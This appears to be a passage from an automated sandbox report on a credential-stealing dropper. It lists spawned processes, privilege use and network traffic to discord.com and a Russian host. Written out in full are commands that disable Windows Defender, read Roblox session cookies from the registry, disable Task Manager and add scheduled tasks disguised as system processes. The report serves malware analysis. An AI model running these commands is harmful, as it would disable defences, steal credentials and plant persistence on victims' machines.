Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3196 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\stealer.exe
PID 3196 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\stealer.exe
PID 3196 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
PID 3196 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
PID 3196 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
PID 3196 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\Inject.exe
PID 3196 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\Inject.exe
PID 4664 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\чекер dc.exe C:\Windows\SysWOW64\WScript.exe
PID 4664 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\чекер dc.exe C:\Windows\SysWOW64\WScript.exe
PID 4664 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\чекер dc.exe C:\Windows\SysWOW64\WScript.exe
PID 1956 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 1956 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 1956 wrote to memory of 4408 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\SYSTEM32\attrib.exe
PID 1956 wrote to memory of 4408 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\SYSTEM32\attrib.exe
PID 1956 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3084 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3084 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 1956 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 1956 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 1956 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 1956 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 1956 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 1956 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3320 wrote to memory of 548 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3320 wrote to memory of 548 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3320 wrote to memory of 548 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 548 wrote to memory of 1548 N/A C:\Windows\SysWOW64\cmd.exe C:\MsWinsessiondllNet\driverBrokercommon.exe
PID 548 wrote to memory of 1548 N/A C:\Windows\SysWOW64\cmd.exe C:\MsWinsessiondllNet\driverBrokercommon.exe
PID 1956 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 1956 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 1548 wrote to memory of 4556 N/A C:\MsWinsessiondllNet\driverBrokercommon.exe C:\Windows\System32\cmd.exe
PID 1548 wrote to memory of 4556 N/A C:\MsWinsessiondllNet\driverBrokercommon.exe C:\Windows\System32\cmd.exe
PID 548 wrote to memory of 4344 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 548 wrote to memory of 4344 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 548 wrote to memory of 4344 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4556 wrote to memory of 740 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 4556 wrote to memory of 740 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 1956 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\SYSTEM32\cmd.exe
PID 1956 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\SYSTEM32\cmd.exe
PID 916 wrote to memory of 2632 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 916 wrote to memory of 2632 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 4556 wrote to memory of 2020 N/A C:\Windows\System32\cmd.exe C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe
PID 4556 wrote to memory of 2020 N/A C:\Windows\System32\cmd.exe C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe
PID 2020 wrote to memory of 2996 N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe C:\Windows\System32\WScript.exe
PID 2020 wrote to memory of 2996 N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe C:\Windows\System32\WScript.exe
PID 2020 wrote to memory of 4048 N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe C:\Windows\System32\WScript.exe
PID 2020 wrote to memory of 4048 N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe C:\Windows\System32\WScript.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe

"C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe"

C:\Users\Admin\AppData\Local\Temp\stealer.exe

"C:\Users\Admin\AppData\Local\Temp\stealer.exe"

C:\Users\Admin\AppData\Local\Temp\чекер dc.exe

"C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"

C:\Users\Admin\AppData\Local\Temp\Inject.exe

"C:\Users\Admin\AppData\Local\Temp\Inject.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\stealer.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stealer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "

C:\MsWinsessiondllNet\driverBrokercommon.exe

"C:\MsWinsessiondllNet\driverBrokercommon.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 13 /tr "'C:\MsWinsessiondllNet\sysmon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\sysmon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\sysmon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dFjI7tVufc.bat"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\stealer.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe

"C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4f7f3a5f-13d0-4896-b122-f11ad12acd3b.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bd577cd0-adcf-48e3-95fc-6ecef81cdaf1.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 216.58.201.99:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
BE 2.17.196.105:443 www.bing.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 105.196.17.2.in-addr.arpa udp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 a0947008.xsph.ru udp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
US 8.8.8.8:53 103.192.8.141.in-addr.arpa udp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
